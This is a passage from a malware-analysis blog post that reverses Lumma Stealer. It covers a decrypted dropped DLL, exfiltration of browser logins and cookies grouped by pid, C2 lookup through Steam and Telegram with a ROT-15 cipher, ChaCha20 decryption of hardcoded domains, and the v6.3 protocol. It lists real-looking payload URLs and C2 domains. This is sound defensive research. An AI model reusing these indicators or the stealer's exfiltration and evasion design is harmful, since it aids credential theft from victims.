        &lt;span class=&quot;token property&quot;&gt;&quot;u&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://arting.ee/cgi-bin/netsup_clean.ps1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;ft&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;e&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;ft&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;e&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token property&quot;&gt;&quot;d&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;base64 string ...&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Without further reversing the code responsible for decrypting these payloads, I reused the previously &lt;code class=&quot;language-text&quot;&gt;lumma_decryption()&lt;/code&gt; routine. The decrypted output of the Base64 string immediately revealed a valid PE file, which is indicated by the presence of the standard &lt;code class=&quot;language-text&quot;&gt;MZ&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;PE&lt;/code&gt; headers:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;MZ\x00\x01\x00...This program cannot be run in DOS mode...PE\x00\x00...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When saved as &lt;code class=&quot;language-text&quot;&gt;dropped.dll&lt;/code&gt; and examined with the &lt;code class=&quot;language-text&quot;&gt;file&lt;/code&gt; utility, the output confirmed its nature:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;dropped.dll: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;At the time of analysis, the hashes of the dropped DLL were not associated with any known samples in public threat intelligence databases:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SHA256:&lt;/strong&gt; &lt;a href=&quot;https://www.virustotal.com/gui/search/d795aeec6dedacf10f82dd31d69ead6946b88a66ec211e81f1eb190102524578&quot;&gt;d795aeec6dedacf10f82dd31d69ea...&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MD5:&lt;/strong&gt; &lt;a href=&quot;https://www.virustotal.com/gui/search/250098f7c58e2290a2056e00d0c5127b&quot;&gt;250098f7c58e2290a2056e00d0c5127b&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This finding further confirms that Lumma Stealer can deliver new stages through encrypted &lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt; responses.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;data-exfiltration&quot;&gt;&lt;/a&gt;Data Exfiltration&lt;/h2&gt;
&lt;p&gt;Through experimental analysis, it was observed that Lumma Stealer transmits the exfiltrated data in the form of ZIP archives (identified by the magic number &lt;code class=&quot;language-text&quot;&gt;PK&lt;/code&gt;) using multiple &lt;code class=&quot;language-text&quot;&gt;send_message&lt;/code&gt; requests. Each request differs by a single parameter: &lt;code class=&quot;language-text&quot;&gt;pid&lt;/code&gt;, which appears to categorize the exfiltration phase or the type of data sent. This &lt;code class=&quot;language-text&quot;&gt;pid&lt;/code&gt; field effectively serves as a tag or classification label that helps organize the stolen information into logical groups.&lt;/p&gt;
&lt;p&gt;Still using the HTTPS server discussed in the previous sections, the following ZIP files were recovered, each corresponding to different &lt;code class=&quot;language-text&quot;&gt;pid&lt;/code&gt; values:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Chrome data — &lt;code class=&quot;language-text&quot;&gt;pid=2&lt;/code&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt; inflating: Chrome/dp.txt
 inflating: Chrome/Default/History
 inflating: Chrome/Default/Login Data
 inflating: Chrome/Default/Login Data For Account
 inflating: Chrome/Default/Network/Cookies
 inflating: Chrome/Default/Web Data
 inflating: Chrome/ab.txt
 inflating: Chrome/BrowserVersion.txt&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;Edge data — &lt;code class=&quot;language-text&quot;&gt;pid=2&lt;/code&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt; inflating: Edge/dp.txt
 inflating: Edge/Default/History
 inflating: Edge/Default/Login Data
 inflating: Edge/Default/Web Data
 inflating: Edge/BrowserVersion.txt&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;Firefox data — &lt;code class=&quot;language-text&quot;&gt;pid=3&lt;/code&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt; inflating: Mozilla Firefox/fqs92o4p.default-release/key4.db
 inflating: Mozilla Firefox/fqs92o4p.default-release/cert9.db
 inflating: Mozilla Firefox/fqs92o4p.default-release/cookies.sqlite
 inflating: Mozilla Firefox/fqs92o4p.default-release/places.sqlit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;User “Important Files” (e.g., &lt;code class=&quot;language-text&quot;&gt;.txt&lt;/code&gt; files on Desktop) — &lt;code class=&quot;language-text&quot;&gt;pid=1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Software inventory and process list (e.g., &lt;code class=&quot;language-text&quot;&gt;Software.txt&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Processes.txt&lt;/code&gt;) — &lt;code class=&quot;language-text&quot;&gt;pid=1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;System information (e.g., &lt;code class=&quot;language-text&quot;&gt;System.txt&lt;/code&gt;, optionally &lt;code class=&quot;language-text&quot;&gt;Clipboard.txt&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;Screen.png&lt;/code&gt;) — &lt;code class=&quot;language-text&quot;&gt;pid=1&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By analyzing network traffic collected from public sandboxes and from controlled local executions, in which specific softwares was installed to reflect the targets defined in the configuration received via the &lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt; command, I was able to identify three main exfiltration categories associated with the &lt;code class=&quot;language-text&quot;&gt;pid&lt;/code&gt; parameter:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;pid=2&lt;/code&gt;: data from Chromium-based browsers and associated crypto or 2FA extensions&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;pid=3&lt;/code&gt;: data from Mozilla Firefox and associated crypto or 2FA extensions&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;pid=1&lt;/code&gt;: general system and user profiling (including screenshots, clipboard data, process lists, and sensitive documents)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This behavior suggests that Lumma Stealer adopts a modular approach to data exfiltration, where each category of information is sent in a separate and ordered way. This structure likely helps reduce the risk of detection and improves the reliability of the operation.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;dynamic-retrieve-of-new-c2s&quot;&gt;&lt;/a&gt;Dynamic retrieve of new C2s&lt;/h2&gt;
&lt;p&gt;During analysis of LummaC2 network traffic, it was observed that the malware contacts legitimate web services to retrieve additional information needed to continue its execution. One notable example involves accessing a Steam profile hosted at &lt;code class=&quot;language-text&quot;&gt;steamcommunity.com/profiles/76561199724331900&lt;/code&gt;, which returned a public page containing the username &lt;code class=&quot;language-text&quot;&gt;xlcdslw-ksfvzg.nzx&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Initially, the string &lt;code class=&quot;language-text&quot;&gt;xlcdslw-ksfvzg.nzx&lt;/code&gt; did not correspond to any known domain or recognizable token. However, its fully alphabetic composition and domain-like structure suggested it was lightly obfuscated rather than strongly encrypted. By comparing the ciphertext with the decrypted result present in the network traffic &lt;code class=&quot;language-text&quot;&gt;marshal-zhukov.com&lt;/code&gt;, it became clear that each character in the ciphertext corresponds to a plaintext character at a fixed distance of 15 positions in the alphabet. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ciphertext “x” maps to plaintext “m” (a backward shift of 15)&lt;/li&gt;
&lt;li&gt;ciphertext “l” maps to plaintext “a” (again a shift of 15)&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To validate this hypothesis, all possible Caesar rotations (ROT-1 to ROT-25) were tested using a brute-force script that systematically applies each rotation and looks for the &lt;code class=&quot;language-text&quot;&gt;marshal-zhukov.com&lt;/code&gt; domain in the output. &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/04-lummastealer_v4_bruteforce_Caesar_cipher/&quot;&gt;Here is the script and the output&lt;/a&gt; that confirms the use of ROT-15.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;#update-10012025-changed-hardcoded-domains-decryption&quot;&gt;&lt;/a&gt;Update 10/01/2025: Changed hardcoded domains decryption&lt;/h1&gt;
&lt;h2&gt;&lt;a id=&quot;introduction-1&quot;&gt;&lt;/a&gt;Introduction&lt;/h2&gt;
&lt;p&gt;The following technical analysis focuses on a sample of Lumma Stealer retrieved from the &lt;a href=&quot;https://bazaar.abuse.ch/sample/38d0913c2700b23f2e7f8196d570b3112ecc205651cab4f079e53a93b81be5f3/&quot;&gt;MalwareBazaar&lt;/a&gt; platform.
All the techniques previously described in this blog post were applied to this variant. For the sake of brevity, this section will focus exclusively on the differences and new findings specific to this sample.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Since the communication mechanism remained unchanged in this version, the update was not analyzed immediately. A more in-depth investigation was carried out only after March 6, 2025. As a result, some traces of the subsequent update (such as the appearance of the &lt;code class=&quot;language-text&quot;&gt;uid&lt;/code&gt; string) are already present in this analysis. For clarity and consistency, these elements will only be mentioned briefly here and will be discussed in detail in the appropriate section dedicated to the newer version.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;dynamic-analysis&quot;&gt;&lt;/a&gt;Dynamic analysis&lt;/h2&gt;
&lt;p&gt;By running the new sample in CAPEv2 with INetSim enabled, I was able to easily extract the command and control (C2) domains used by the malware.&lt;/p&gt;
&lt;p&gt;The first HTTP request is always made to the Telegram endpoint &lt;code class=&quot;language-text&quot;&gt;t.me/asdawfq&lt;/code&gt;, which is used to dynamically fetch a new C2 domain. The next requests, which represent the hardcoded C2s in the malware itself, are:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;astralconnec.icu/DPowko
begindecafer.world/QwdZdf
garagedrootz.top/oPsoJAN
modelshiverd.icu/bJhnsj
arisechaird.shop/JnsHY
catterjur.run/boSnzhu
orangemyther.live/IozZ
fostinjec.today/LksNAz
sterpickced.digital/plSOz&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, two additional requests are directed to &lt;code class=&quot;language-text&quot;&gt;steamcommunity.com/profiles/76561199822375128&lt;/code&gt;, which appears to serve as a fallback mechanism for dynamically retrieving C2 domains if the Telegram-based method fails.&lt;/p&gt;
&lt;p&gt;This behavior shows a major change in how C2 endpoints are contacted. Instead of always using the static &lt;code class=&quot;language-text&quot;&gt;/api&lt;/code&gt; path as in earlier versions, the new variant uses dynamic and unpredictable URLs. This is likely intended to evade pattern-based detection mechanisms.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;identifying-the-decryption-routine-1&quot;&gt;&lt;/a&gt;Identifying the decryption routine&lt;/h2&gt;
&lt;p&gt;The image below illustrates the logical flow that led to the identification of a new decryption function in the analyzed Lumma Stealer sample.&lt;/p&gt;
&lt;div class=&quot;img-big&quot; align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/4e5d990231f47f46188998dade8d2e88/d777c/dynamic%20analysis%20-%20x64dbg%203.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 58.59375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAAsTAAALEwEAmpwYAAACkUlEQVR42k2Sy3LScBTG8wxWyzWQG1R04ehUSrEtderUKtPu1I19ATc6HV/DZ3Hlwhlbp0MFKYFSLiElhJCQtCRckgKhJCmJ/7Ybz3xz5tv8zvn+F+jd+w8rK2uJxDrQ+vrLtbXExsYrlmUdx5nNZrZtA6P3unTqkDnJ1QvZ+nGWL5zITUblWCgaj7s9Lpfb63J73B7vvMvt9wcoivofHnWVajrFUtVGpVwvnLYp2uqKjtaBXiQSWDgUCCJwIAi6Hw6gOFErl29g0wQDgLlS+7XU0dmfPJPJ0RmSOSKtjuBoMhSPxR4SBIJid7DPDyMAzmQc0xxIktbr9dVBv6v0REHjm1fKhTW+tK/GjmE40ykUW4qGcQQPAR4NIrcwhtfIPFhYZ9k6w7RaLY4TBOFcaHckSel1tfFkKuvqaDqBFp9Hw5HQQiQMYLA5EAxiBFHOZie6Puj3RVEcDAYNOt+spQWWbDdIgSb5xnGR+an0OGgpHiMeLWALYTgYBMl9Pj9GhAqpFF05SR/utwX+euY0at+4yqfm6R5b+SKd7Yn01/PK54l6AMXiy1gYR3EcRpAAgnpvY1MkCWIPL8GRe8A0SvtM9jtP/W5Vf/HVAyA2/0PtgKeKRYkwhoXApSEhFMX8fhzF7mDTNGVZBkZs8RelmlJhpFr9gmKUhiCetYZ9DUrElp9FIosotur1rfrhm46gdC4HGHs2k0TRMAxdH2myPOK4kdgaS8KQF6f62DKm0OMnT91eGAYfZe6+58H8/L052OWmSqUb2LYVRbYsq1mvnpLpUj5HF/+26CJVLSp8Q78cQLsfdzdfbyWTO8nk9tvk9ubWm+T2TrPJ3cH6bWmaql72h+OhMZ1YxsSyzdm1Zduzfx72ykMkP17rAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;dynamic analysis - x64dbg 3&quot; title=&quot;&quot; src=&quot;/website/static/4e5d990231f47f46188998dade8d2e88/71c1d/dynamic%20analysis%20-%20x64dbg%203.png&quot; srcset=&quot;/website/static/4e5d990231f47f46188998dade8d2e88/804b2/dynamic%20analysis%20-%20x64dbg%203.png 384w,
/website/static/4e5d990231f47f46188998dade8d2e88/e5715/dynamic%20analysis%20-%20x64dbg%203.png 768w,
/website/static/4e5d990231f47f46188998dade8d2e88/71c1d/dynamic%20analysis%20-%20x64dbg%203.png 1536w,
/website/static/4e5d990231f47f46188998dade8d2e88/d777c/dynamic%20analysis%20-%20x64dbg%203.png 1555w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;Until the call to the function at address &lt;code class=&quot;language-text&quot;&gt;0x40da90&lt;/code&gt;, the malware exclusively attempts to contact legitimate services such as Telegram or Steam, with the goal of dynamically retrieving updated C2 domains. From this point onward, execution continues into the function located at &lt;code class=&quot;language-text&quot;&gt;0x4113b0&lt;/code&gt;, which immediately invokes a subroutine at &lt;code class=&quot;language-text&quot;&gt;0x411770&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This subroutine retrieves the string &lt;code class=&quot;language-text&quot;&gt;uid&lt;/code&gt;, which, like the &lt;code class=&quot;language-text&quot;&gt;lid&lt;/code&gt; string previously observed, is hardcoded in the &lt;code class=&quot;language-text&quot;&gt;.rdata&lt;/code&gt; section of memory.&lt;/p&gt;
&lt;p&gt;Next, the function decodes the string &lt;code class=&quot;language-text&quot;&gt;Content-Type: application/x-www-form-urlencoded&lt;/code&gt; and proceeds to call a subroutine at &lt;code class=&quot;language-text&quot;&gt;0x40ef00&lt;/code&gt;, responsible for de-obfuscating the user agent string. Following this step, the malware invokes the standard Windows API &lt;code class=&quot;language-text&quot;&gt;WinHttpOpen()&lt;/code&gt; and then calls another function at &lt;code class=&quot;language-text&quot;&gt;0x40fdc0&lt;/code&gt;, which prepares the necessary arguments before making a final call to the function at &lt;code class=&quot;language-text&quot;&gt;0x40cd20&lt;/code&gt;. For clarity, we refer to this last function as &lt;code class=&quot;language-text&quot;&gt;lumma_new_decryption()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The function receives four arguments:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;a pointer to an initialization structure containing the string &lt;code class=&quot;language-text&quot;&gt;expand 32-byte k&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;a pointer to a buffer that appears to be ciphertext, presumably the input to be decrypted&lt;/li&gt;
&lt;li&gt;a second buffer that is likely used as output&lt;/li&gt;
&lt;li&gt;the length of the input buffer&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Notably, the second argument points to the &lt;code class=&quot;language-text&quot;&gt;.rdata&lt;/code&gt; section, indicating that it likely contains hardcoded and encrypted domain names, as previously observed in earlier stages of the analysis.&lt;/p&gt;
&lt;h2&gt;&lt;a id=&quot;understanding-the-decryption-logic-1&quot;&gt;&lt;/a&gt;Understanding the Decryption Logic&lt;/h2&gt;
&lt;h3&gt;&lt;a id=&quot;salsa20-and-chacha20&quot;&gt;&lt;/a&gt;Salsa20 and Chacha20&lt;/h3&gt;
&lt;p&gt;Salsa20 is a stream cipher designed by Daniel J. Bernstein in 2005. It operates on a 512-bit internal state structured as a 4×4 matrix of 32-bit words. The matrix includes a 256-bit key, a 64-bit nonce, a 64-bit counter, and a 128-bit constant: &quot;expand 32-byte k&quot;.&lt;/p&gt;
&lt;p&gt;This ASCII string is split into four 32-bit words and inserted into the matrix to distinguish the 256-bit key setup. For 128-bit keys, the constant &quot;expand 16-byte k&quot; is used instead. The constant ensures unambiguous initialization and avoids collisions between different key lengths.&lt;/p&gt;
&lt;p&gt;The cipher applies 20 rounds of simple operations (modular addition, XOR, and rotation) to generate the keystream.&lt;/p&gt;
&lt;p&gt;ChaCha20 is a modified version of Salsa20 that retains the same input structure (including the &quot;expand 32-byte k&quot; constant) but changes the round function for better diffusion and resistance to attacks. It is now widely adopted in modern cryptographic protocols.&lt;/p&gt;
&lt;p&gt;Both Salsa20 and ChaCha20 initialize a 4×4 state matrix using the constant string &quot;expand 32-byte k&quot;, followed by the key, a counter, and a nonce. The key difference is in the placement of the counter and nonce:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Salsa20 places the counter in the middle and the nonce in the upper-right.&lt;/li&gt;
&lt;li&gt;ChaCha20 places the counter in the lower-left and the nonce in the lower-right.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;a id=&quot;chacha20-proof&quot;&gt;&lt;/a&gt;Chacha20 proof&lt;/h3&gt;
&lt;p&gt;As shown in the following image, the memory dump observed during the analysis matches the ChaCha20 layout, including the constants, key, counter, and nonce positions. This strongly suggests the function implements ChaCha20.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 715px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/d27e855d09ce6b9cd2d6909e2841c476/d0c0e/chacha20%20confirm.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAACQklEQVR42o3O72sScRwHcGMQ/T/R4+hBPewXPRosIoq0KTmsBdEPIioiKPqBlS11TuY21E0n01PDH03HlnNslvPHqXfze96dip53532781c3tx5ET3rzgTd8PrzgoxgMAyHk5bTbggDbAmQ5nuV5CAWe43iOF9r7B04OyzabTVEUD5TioPYAgRaKDA0aFYzGslyDGgy6MkGLWL6IYWUCLeE5tNTiBShJnW7vL9wiSqntnYtz+FkbfW62eX6+pQl1hV8ihabpYqaG5et4nkR3WbrMV0FXhIe4P6xHcea0h5+IwgvujRNzljN2642AEzBQ5SKU3oZyuaJCmsplQukhx5xgk5Jk0uvLeKinp5C3D2cky2dqdWYLt13z2Ed9kXRNPPqGH9FLR15xI/rOyAv22GuoeMo50X3T6f3BtqmVJ5Nm7bhB935dg8DLC3VdQAB0S33frny8cvOe4/oz30mr+9QCcnzaFQZVmXT7/cO3XyaFSyHxahReCbJjPnYLr/W5WodhBLOhbfooGj81Te+QrMWPWj2ZLxSHyaQv48H/BMIBVvp3rSgAUATg5046u5vL5wpYhd6j6kStgaF44Ue2kMoAnCDLNIkTgKiWcZIAtDwkWZdESTH6XK/5MKszuO6a3beNS3dM7kmj58F8RGsLqOwetcOrdYdvOcPqJb96MTi+6Nc4EI3964QrgjOMIulF0pEouraej8WzsdVsLJaLxdD42rdiwlv9HqwmESrhpxIIteGvJSLtVIjdDpCbQTrJdLnfWUMb0O4u8WsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;chacha20 confirm&quot; title=&quot;&quot; src=&quot;/website/static/d27e855d09ce6b9cd2d6909e2841c476/d0c0e/chacha20%20confirm.png&quot; srcset=&quot;/website/static/d27e855d09ce6b9cd2d6909e2841c476/804b2/chacha20%20confirm.png 384w,
/website/static/d27e855d09ce6b9cd2d6909e2841c476/d0c0e/chacha20%20confirm.png 715w&quot; sizes=&quot;(max-width: 715px) 100vw, 715px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;An important clarification: the presence of an 8-byte nonce and an 8-byte counter indicates that this corresponds to the original ChaCha20 construction, not the modern standardized variant defined in &lt;a href=&quot;https://datatracker.ietf.org/doc/html/rfc8439&quot;&gt;RFC 8439&lt;/a&gt;, which specifies a 12-byte nonce and a 4-byte counter.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;To confirm that the &lt;code class=&quot;language-text&quot;&gt;lumma_new_decryption()&lt;/code&gt; function actually implements the ChaCha20 cipher, the encrypted data observed in memory was transferred to Python and decrypted using the official ChaCha20 library implementation. As shown in the previously referenced image, the function is invoked with four arguments: an initialization structure (containing the string &lt;code class=&quot;language-text&quot;&gt;expand 32-byte k&lt;/code&gt;), the ciphertext buffer, an output buffer, and the ciphertext length. A key detail to note is that, at the time the screenshot is taken, the internal counter is set to &lt;code class=&quot;language-text&quot;&gt;2&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Since ChaCha20 is a stream cipher whose keystream generation is sensitive to the internal block counter, it was necessary to simulate multiple decryption cycles to automatically increment the internal counter. This &lt;a href=&quot;https://federicofantini.github.io/TheTrackerShow/scripts/python/05-lummastealer_v6.3_chacha20_proof/&quot;&gt;Python script&lt;/a&gt; illustrates this approach. When the decryption routine is invoked the second time (&lt;code class=&quot;language-text&quot;&gt;counter=2&lt;/code&gt;), the plaintext is recovered correctly, revealing the expected C2 domain &lt;code class=&quot;language-text&quot;&gt;astralconnec.icu/DPowko&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This experiment provides strong evidence that the function under analysis implements the ChaCha20 algorithm.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;&lt;/p&gt;
&lt;h1&gt;&lt;a id=&quot;update-06032025-changed-communication-protocol--lumma-v63&quot;&gt;&lt;/a&gt;Update 06/03/2025: Changed communication protocol = lumma v6.3&lt;/h1&gt;
&lt;h2&gt;&lt;a id=&quot;introduction-2&quot;&gt;&lt;/a&gt;Introduction&lt;/h2&gt;
&lt;p&gt;The release of Lumma Stealer version 6.3 introduced significant changes to the malware&apos;s C2 communication protocol. At first glance, the structure of the interaction appears significantly altered compared to the previous version.&lt;/p&gt;
&lt;p&gt;One of the most noticeable changes is the removal of the &lt;code class=&quot;language-text&quot;&gt;act&lt;/code&gt; parameter, which previously made it easier to identify and differentiate the different communication phases. Additionally, the initial &lt;code class=&quot;language-text&quot;&gt;act=life&lt;/code&gt; step (used in previous versions as a sort of &quot;ping&quot; of the server) has been removed. Communication now starts directly with what was previously known as &lt;code class=&quot;language-text&quot;&gt;act=recive_message&lt;/code&gt;, presumably to be more stealthy.&lt;/p&gt;
&lt;p&gt;The updated structure of the three steps of the malware&apos;s C2 protocol can be summarized as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;recive_message&lt;/code&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client-side parameters&lt;/strong&gt;: &lt;code class=&quot;language-text&quot;&gt;uid=...&amp;amp;cid=...&lt;/code&gt;
The &lt;code class=&quot;language-text&quot;&gt;uid&lt;/code&gt; parameter likely serves as a unique identifier for the client that has purchased access to the Malware-as-a-Service (MaaS) infrastructure, replacing the previous &lt;code class=&quot;language-text&quot;&gt;lid&lt;/code&gt; field.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Server response&lt;/strong&gt;: Encrypted data, now using a new encryption scheme (discussed in the following sections).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;send_message&lt;/code&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client-side payload&lt;/strong&gt;: Form data containing &lt;code class=&quot;language-text&quot;&gt;uid&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;pid&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;hwid&lt;/code&gt;, and a file encrypted using the new scheme.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Server Response&lt;/strong&gt;: JSON confirmation message indicating successful delivery of data, e.g. &lt;code class=&quot;language-text&quot;&gt;{&quot;success&quot;:{&quot;message&quot;:&quot;message success delivery from [IP-ADDR]&quot;}}&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;get_message&lt;/code&gt;&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Client-side parameters&lt;/strong&gt;: &lt;code class=&quot;language-text&quot;&gt;uid=...&amp;amp;cid=...&amp;amp;hwid=...&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Server Response&lt;/strong&gt;: Encrypted data retrieved using the new encryption scheme.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
